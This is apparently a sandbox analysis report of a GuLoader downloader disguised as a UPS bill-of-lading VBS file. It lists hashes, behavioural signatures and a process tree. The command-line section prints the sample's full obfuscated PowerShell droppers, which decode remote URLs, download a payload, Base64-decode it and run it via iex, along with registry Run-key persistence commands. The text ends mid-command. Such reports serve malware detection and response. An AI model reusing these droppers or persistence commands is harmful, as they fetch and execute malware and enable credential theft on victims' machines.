guloader | 561072bf60c33ed6cfc54afc54024edc70f09ef75d8b4ccd08be30aa118b8e72

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
28-06-2024 10:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbs
Size

187KB
MD5

390112d76dc2b8ef98de61363c2bd2ea
SHA1

467811ef0dbaebc381e8c18ed248aa6339a35a83
SHA256

561072bf60c33ed6cfc54afc54024edc70f09ef75d8b4ccd08be30aa118b8e72
SHA512

1e6ec942c13e1da2b152049f4601e17f9e1150ac1d842b857c47c1ca88cccb61d6a9620521b6726534dbb0d0dc6e27afe159c6ca966c4cb264312a056b7574ec
SSDEEP

3072:9mN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZT:908GxbKja3+DCbKCvBB/WnHXC/sLJFJI

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/3456-85-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral2/memory/4272-76-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral2/memory/3456-85-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral2/memory/4272-76-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4272-76-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/3456-85-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4008-80-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

flow pid process

4 3132 WScript.exe
15 4688 powershell.exe
52 4572 powershell.exe

flow	pid	process
4	3132	WScript.exe
15	4688	powershell.exe
52	4572	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lbsk = "%Immovables% -w 1 $Pingpongen=(Get-ItemProperty -Path 'HKCU:\\Intrastate\\').bademestrenes;%Immovables% ($Pingpongen)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rollingerne = "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\\overdeferential\\').retoucheres;%Montuvio% ($Lkapsler)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs

Processes:

wab.exewab.exe

pid process

4100 wab.exe
4100 wab.exe
652 wab.exe
652 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

powershell.exewab.exepowershell.exewab.exe

pid process

316 powershell.exe
4100 wab.exe
3140 powershell.exe
652 wab.exe

pid	process
4100	wab.exe
4100	wab.exe
652	wab.exe
652	wab.exe

pid	process
316	powershell.exe
4100	wab.exe
3140	powershell.exe
652	wab.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

powershell.exewab.exepowershell.exe

description	pid	process	target process
PID 316 set thread context of 4100	316	powershell.exe	wab.exe
PID 4100 set thread context of 4272	4100	wab.exe	wab.exe
PID 4100 set thread context of 3456	4100	wab.exe	wab.exe
PID 4100 set thread context of 4008	4100	wab.exe	wab.exe
PID 3140 set thread context of 652	3140	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

wab.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings wab.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4980 reg.exe
3732 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	wab.exe

pid	process
4980	reg.exe
3732	reg.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.exepowershell.exewab.exewab.exepowershell.exewab.exe

pid	process
4688	powershell.exe
4688	powershell.exe
316	powershell.exe
316	powershell.exe
316	powershell.exe
4572	powershell.exe
4272	wab.exe
4272	wab.exe
4008	wab.exe
4008	wab.exe
4572	powershell.exe
4272	wab.exe
4272	wab.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe
652	wab.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exewab.exepowershell.exe

pid process

316 powershell.exe
4100 wab.exe
4100 wab.exe
4100 wab.exe
3140 powershell.exe

pid	process
316	powershell.exe
4100	wab.exe
4100	wab.exe
4100	wab.exe
3140	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exewab.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4008	wab.exe
Token: SeDebugPrivilege	3140	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

4100 wab.exe

pid	process
4100	wab.exe

Suspicious use of WriteProcessMemory 59 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 3132 wrote to memory of 4688	3132	WScript.exe	powershell.exe
PID 3132 wrote to memory of 4688	3132	WScript.exe	powershell.exe
PID 4688 wrote to memory of 744	4688	powershell.exe	cmd.exe
PID 4688 wrote to memory of 744	4688	powershell.exe	cmd.exe
PID 4688 wrote to memory of 316	4688	powershell.exe	powershell.exe
PID 4688 wrote to memory of 316	4688	powershell.exe	powershell.exe
PID 4688 wrote to memory of 316	4688	powershell.exe	powershell.exe
PID 316 wrote to memory of 4104	316	powershell.exe	cmd.exe
PID 316 wrote to memory of 4104	316	powershell.exe	cmd.exe
PID 316 wrote to memory of 4104	316	powershell.exe	cmd.exe
PID 316 wrote to memory of 4100	316	powershell.exe	wab.exe
PID 316 wrote to memory of 4100	316	powershell.exe	wab.exe
PID 316 wrote to memory of 4100	316	powershell.exe	wab.exe
PID 316 wrote to memory of 4100	316	powershell.exe	wab.exe
PID 316 wrote to memory of 4100	316	powershell.exe	wab.exe
PID 4100 wrote to memory of 2740	4100	wab.exe	cmd.exe
PID 4100 wrote to memory of 2740	4100	wab.exe	cmd.exe
PID 4100 wrote to memory of 2740	4100	wab.exe	cmd.exe
PID 2740 wrote to memory of 4980	2740	cmd.exe	reg.exe
PID 2740 wrote to memory of 4980	2740	cmd.exe	reg.exe
PID 2740 wrote to memory of 4980	2740	cmd.exe	reg.exe
PID 4100 wrote to memory of 4412	4100	wab.exe	WScript.exe
PID 4100 wrote to memory of 4412	4100	wab.exe	WScript.exe
PID 4100 wrote to memory of 4412	4100	wab.exe	WScript.exe
PID 4412 wrote to memory of 4572	4412	WScript.exe	powershell.exe
PID 4412 wrote to memory of 4572	4412	WScript.exe	powershell.exe
PID 4412 wrote to memory of 4572	4412	WScript.exe	powershell.exe
PID 4100 wrote to memory of 4272	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4272	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4272	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4272	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 3456	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 3456	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 3456	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 3456	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4008	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4008	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4008	4100	wab.exe	wab.exe
PID 4100 wrote to memory of 4008	4100	wab.exe	wab.exe
PID 4572 wrote to memory of 596	4572	powershell.exe	cmd.exe
PID 4572 wrote to memory of 596	4572	powershell.exe	cmd.exe
PID 4572 wrote to memory of 596	4572	powershell.exe	cmd.exe
PID 4572 wrote to memory of 3140	4572	powershell.exe	powershell.exe
PID 4572 wrote to memory of 3140	4572	powershell.exe	powershell.exe
PID 4572 wrote to memory of 3140	4572	powershell.exe	powershell.exe
PID 3140 wrote to memory of 1184	3140	powershell.exe	cmd.exe
PID 3140 wrote to memory of 1184	3140	powershell.exe	cmd.exe
PID 3140 wrote to memory of 1184	3140	powershell.exe	cmd.exe
PID 3140 wrote to memory of 652	3140	powershell.exe	wab.exe
PID 3140 wrote to memory of 652	3140	powershell.exe	wab.exe
PID 3140 wrote to memory of 652	3140	powershell.exe	wab.exe
PID 3140 wrote to memory of 652	3140	powershell.exe	wab.exe
PID 3140 wrote to memory of 652	3140	powershell.exe	wab.exe
PID 652 wrote to memory of 4956	652	wab.exe	cmd.exe
PID 652 wrote to memory of 4956	652	wab.exe	cmd.exe
PID 652 wrote to memory of 4956	652	wab.exe	cmd.exe
PID 4956 wrote to memory of 3732	4956	cmd.exe	reg.exe
PID 4956 wrote to memory of 3732	4956	cmd.exe	reg.exe
PID 4956 wrote to memory of 3732	4956	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Lagringskapaciteten Pauciplicate Opsmningen206 Raasyltendes Teserne117 Immenseness Offentligs112 Pollinarium154 Kalejdoskopet Saurornithic Archigony9 Dorsimesal atomatic Fiberplade Forrentet Paratroopers Skolemodenhedsprverne netlister Regelmssigstes Weelfard Nonemphatical Exanthem Tablefellow Phytophysiology Lagringskapaciteten Pauciplicate Opsmningen206 Raasyltendes Teserne117 Immenseness Offentligs112 Pollinarium154 Kalejdoskopet Saurornithic Archigony9 Dorsimesal atomatic Fiberplade Forrentet Paratroopers Skolemodenhedsprverne netlister Regelmssigstes Weelfard Nonemphatical Exanthem Tablefellow Phytophysiology';If (${host}.CurrentCulture) {$Giveren++;}Function Discommoded($Fuksernes){$labialises=$Fuksernes.Length-$Giveren;$Beregningsenhedernes='SUBsTRI';$Beregningsenhedernes+='ng';For( $Triazoles=1;$Triazoles -lt $labialises;$Triazoles+=2){$Lagringskapaciteten+=$Fuksernes.$Beregningsenhedernes.Invoke( $Triazoles, $Giveren);}$Lagringskapaciteten;}function Hindres($Etherealized){ . ($Iturevet) ($Etherealized);}$Skihopperes=Discommoded '.MDoEz iHl l,aP/ 5 . 0 ,(IWSidnVdMoRw,sD N TM 1 0B.P0 ;T RWMi n 6M4M;D RxS6.4V;P .rTv.: 1R2S1.. 0F)R HGBeAcNk oS/P2C0,1 0a0 1 0X1 FUi.rSeEfPo.xI/ 1 2 1B.G0S ';$Produktionsudvidelse=Discommoded 'DU sSe.rB-RABg e n tG ';$Teserne117=Discommoded ' httBtmp.sK:L/./ eTv oTlLuUxAc o nPt a b i lEi,d,a d,e .ScHo mT.,bmr / pSusbL/IT aFasrse.pEeDrFsTe dGeUsP.,sBe aF>ahAtStBp sS:A/ /,eOu,rBoF-Af iJe,r.-Gv e cKh,iJ..rBo./dTSaPasr eSp e,rFs.eSd eMs .EsCe a ';$recessens=Discommoded 'W>T ';$Iturevet=Discommoded 'SiDeIxE ';$Zygosphene='Pollinarium154';$Preexperiment = Discommoded 'Oe cDh,o. % aGp pSdAaPtAan% \LU.n,a sHp i r i n,gH.AITr iF .&L&, BePcTh o t. ';Hindres (Discommoded ',$VgPl o,bAaul :,M i,c r,o c o,s mAo.l oMgUyD=S(.cLmTd / c. ,$.PMrYe e xApAe rPiCm eKn tF)P ');Hindres (Discommoded ',$DgBlPo bAaDl : R,a a,sTyTlMtseCnpdReTsT= $AT.eTsbeBr,n eE1 1D7 .Cs p lIiDtA( $Lr.e cSe sJsoe nCs )U ');Hindres (Discommoded '.[ENDeFtO. S e,r vDi cKe,P.o iTnPt M a ncaHg eUrT],:L:,SYebc,u,r i tFyMP,rSoPtOoTcSo,l, P=U [ NfeAt ..S e cOuRrCiAt yHPTrRo.t,oUcboSl T y pUeS]C:.:,T l.sO1 2S ');$Teserne117=$Raasyltendes[0];$Samlebaandet= (Discommoded 'O$ gGlAo.bMaBlR:.sStPr,iAt =VN e wD- O bIjGe.cGt ,SRy,s.t eRmS. NZe t .RWSeSb CBluiNeLn,t');$Samlebaandet+=$Microcosmology[1];Hindres ($Samlebaandet);Hindres (Discommoded 'S$ sStSrLiDtT. H,efaJdMe r,s [,$SP.rSoFd uAkMt i o.n sGuCd v i d,eUlYs eA] =b$AS kSi h,oFpLp e rSeTs, ');$programfejlene=Discommoded ' $.s.tGrCiTt .TD,o,wVnMl.o aLdFFUiGlHe,(U$ TCe s.e r n e.1s1,7 ,T$,EBx.aSnSt.h e m ). ';$Exanthem=$Microcosmology[0];Hindres (Discommoded ',$.gHl oSb a.l,:,Ecs.b,nGdOe,rBuRp = ( TRe s tF- P.a tMh. C$LE.xIa n tChPeTm,) ');while (!$Esbnderup) {Hindres (Discommoded ' $Rg l oBbIa l.:LKIuSlNtLi,vAe r,i.n,g.e r nKedsV=F$StRrCuVe ') ;Hindres $programfejlene;Hindres (Discommoded ',S t a,rDtm-CSIlse eSpF T4K ');Hindres (Discommoded 'K$,gCl oDb aklN:,E,sFbSnCdPeDrFu.pS= (.T.eEs,t -dP a t hg $DEWxOatn t hIe mA) ') ;Hindres (Discommoded '.$GgPl,o,bTa,lO: OTpAs mmnAiUnSgTe n 2 0.6 = $DgRl oFb,aGlP: P,a u,c i,pSl iBc.aRt es+,+ %W$SRsa a sDyZlLtIe nBdUe.s . cBo u n t ') ;$Teserne117=$Raasyltendes[$Opsmningen206];}$skyttelavets=369419;$evilness=26923;Hindres (Discommoded 'S$Fg,l o b a l.: KFaelSe.jGd o.s kOo p e t .=S MGHe tv- CToln t,eCnUt. K$.EAx aSn t hSe.m ');Hindres (Discommoded 'G$.gtl,oAb.a.lF:RWRrsiSs t lHe,tP = S[KSSy s,tUeRmS. CkoPnAv.esrbtr]I:R:AFAr oTmSBCaFsFeP6P4NS t r,i nIg (,$DKPa l,eSjUd oAs k oTp.eGtt). ');Hindres (Discommoded 'S$CgilVoAb aal.: DZo rns.iEm e.sSa,lO =R [FS y.sLt e.m.. T,e,x tG.AEMnAcLoKd.i n gC]D: :SA,SSCTI I.. G eTtVS tPrMi,nug (P$ W,r iDs.tRlSeSt.). ');Hindres (Discommoded 'm$ gHlIo,bCaFl :IR ePdUe g.rReXl.s.e,n,s =.$ D oLr sMi mBe s a lU.SsDu bBs t rSiMnIg ( $cs k y t.tDeAl.a.vDeSt sM,Q$SeSvGiUlan,e sDs.)K ');Hindres $Redegrelsens;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unaspiring.Iri && echo t"
3⤵
PID:744

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Lagringskapaciteten Pauciplicate Opsmningen206 Raasyltendes Teserne117 Immenseness Offentligs112 Pollinarium154 Kalejdoskopet Saurornithic Archigony9 Dorsimesal atomatic Fiberplade Forrentet Paratroopers Skolemodenhedsprverne netlister Regelmssigstes Weelfard Nonemphatical Exanthem Tablefellow Phytophysiology Lagringskapaciteten Pauciplicate Opsmningen206 Raasyltendes Teserne117 Immenseness Offentligs112 Pollinarium154 Kalejdoskopet Saurornithic Archigony9 Dorsimesal atomatic Fiberplade Forrentet Paratroopers Skolemodenhedsprverne netlister Regelmssigstes Weelfard Nonemphatical Exanthem Tablefellow Phytophysiology';If (${host}.CurrentCulture) {$Giveren++;}Function Discommoded($Fuksernes){$labialises=$Fuksernes.Length-$Giveren;$Beregningsenhedernes='SUBsTRI';$Beregningsenhedernes+='ng';For( $Triazoles=1;$Triazoles -lt $labialises;$Triazoles+=2){$Lagringskapaciteten+=$Fuksernes.$Beregningsenhedernes.Invoke( $Triazoles, $Giveren);}$Lagringskapaciteten;}function Hindres($Etherealized){ . ($Iturevet) ($Etherealized);}$Skihopperes=Discommoded '.MDoEz iHl l,aP/ 5 . 0 ,(IWSidnVdMoRw,sD N TM 1 0B.P0 ;T RWMi n 6M4M;D RxS6.4V;P .rTv.: 1R2S1.. 0F)R HGBeAcNk oS/P2C0,1 0a0 1 0X1 FUi.rSeEfPo.xI/ 1 2 1B.G0S ';$Produktionsudvidelse=Discommoded 'DU sSe.rB-RABg e n tG ';$Teserne117=Discommoded ' httBtmp.sK:L/./ eTv oTlLuUxAc o nPt a b i lEi,d,a d,e .ScHo mT.,bmr / pSusbL/IT aFasrse.pEeDrFsTe dGeUsP.,sBe aF>ahAtStBp sS:A/ /,eOu,rBoF-Af iJe,r.-Gv e cKh,iJ..rBo./dTSaPasr eSp e,rFs.eSd eMs .EsCe a ';$recessens=Discommoded 'W>T ';$Iturevet=Discommoded 'SiDeIxE ';$Zygosphene='Pollinarium154';$Preexperiment = Discommoded 'Oe cDh,o. % aGp pSdAaPtAan% \LU.n,a sHp i r i n,gH.AITr iF .&L&, BePcTh o t. ';Hindres (Discommoded ',$VgPl o,bAaul :,M i,c r,o c o,s mAo.l oMgUyD=S(.cLmTd / c. ,$.PMrYe e xApAe rPiCm eKn tF)P ');Hindres (Discommoded ',$DgBlPo bAaDl : R,a a,sTyTlMtseCnpdReTsT= $AT.eTsbeBr,n eE1 1D7 .Cs p lIiDtA( $Lr.e cSe sJsoe nCs )U ');Hindres (Discommoded '.[ENDeFtO. S e,r vDi cKe,P.o iTnPt M a ncaHg eUrT],:L:,SYebc,u,r i tFyMP,rSoPtOoTcSo,l, P=U [ NfeAt ..S e cOuRrCiAt yHPTrRo.t,oUcboSl T y pUeS]C:.:,T l.sO1 2S ');$Teserne117=$Raasyltendes[0];$Samlebaandet= (Discommoded 'O$ gGlAo.bMaBlR:.sStPr,iAt =VN e wD- O bIjGe.cGt ,SRy,s.t eRmS. NZe t .RWSeSb CBluiNeLn,t');$Samlebaandet+=$Microcosmology[1];Hindres ($Samlebaandet);Hindres (Discommoded 'S$ sStSrLiDtT. H,efaJdMe r,s [,$SP.rSoFd uAkMt i o.n sGuCd v i d,eUlYs eA] =b$AS kSi h,oFpLp e rSeTs, ');$programfejlene=Discommoded ' $.s.tGrCiTt .TD,o,wVnMl.o aLdFFUiGlHe,(U$ TCe s.e r n e.1s1,7 ,T$,EBx.aSnSt.h e m ). ';$Exanthem=$Microcosmology[0];Hindres (Discommoded ',$.gHl oSb a.l,:,Ecs.b,nGdOe,rBuRp = ( TRe s tF- P.a tMh. C$LE.xIa n tChPeTm,) ');while (!$Esbnderup) {Hindres (Discommoded ' $Rg l oBbIa l.:LKIuSlNtLi,vAe r,i.n,g.e r nKedsV=F$StRrCuVe ') ;Hindres $programfejlene;Hindres (Discommoded ',S t a,rDtm-CSIlse eSpF T4K ');Hindres (Discommoded 'K$,gCl oDb aklN:,E,sFbSnCdPeDrFu.pS= (.T.eEs,t -dP a t hg $DEWxOatn t hIe mA) ') ;Hindres (Discommoded '.$GgPl,o,bTa,lO: OTpAs mmnAiUnSgTe n 2 0.6 = $DgRl oFb,aGlP: P,a u,c i,pSl iBc.aRt es+,+ %W$SRsa a sDyZlLtIe nBdUe.s . cBo u n t ') ;$Teserne117=$Raasyltendes[$Opsmningen206];}$skyttelavets=369419;$evilness=26923;Hindres (Discommoded 'S$Fg,l o b a l.: KFaelSe.jGd o.s kOo p e t .=S MGHe tv- CToln t,eCnUt. K$.EAx aSn t hSe.m ');Hindres (Discommoded 'G$.gtl,oAb.a.lF:RWRrsiSs t lHe,tP = S[KSSy s,tUeRmS. CkoPnAv.esrbtr]I:R:AFAr oTmSBCaFsFeP6P4NS t r,i nIg (,$DKPa l,eSjUd oAs k oTp.eGtt). ');Hindres (Discommoded 'S$CgilVoAb aal.: DZo rns.iEm e.sSa,lO =R [FS y.sLt e.m.. T,e,x tG.AEMnAcLoKd.i n gC]D: :SA,SSCTI I.. G eTtVS tPrMi,nug (P$ W,r iDs.tRlSeSt.). ');Hindres (Discommoded 'm$ gHlIo,bCaFl :IR ePdUe g.rReXl.s.e,n,s =.$ D oLr sMi mBe s a lU.SsDu bBs t rSiMnIg ( $cs k y t.tDeAl.a.vDeSt sM,Q$SeSvGiUlan,e sDs.)K ');Hindres $Redegrelsens;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unaspiring.Iri && echo t"
4⤵
PID:4104

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "lbsk" /t REG_EXPAND_SZ /d "%Immovables% -w 1 $Pingpongen=(Get-ItemProperty -Path 'HKCU:\Intrastate\').bademestrenes;%Immovables% ($Pingpongen)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "lbsk" /t REG_EXPAND_SZ /d "%Immovables% -w 1 $Pingpongen=(Get-ItemProperty -Path 'HKCU:\Intrastate\').bademestrenes;%Immovables% ($Pingpongen)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:4980

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr 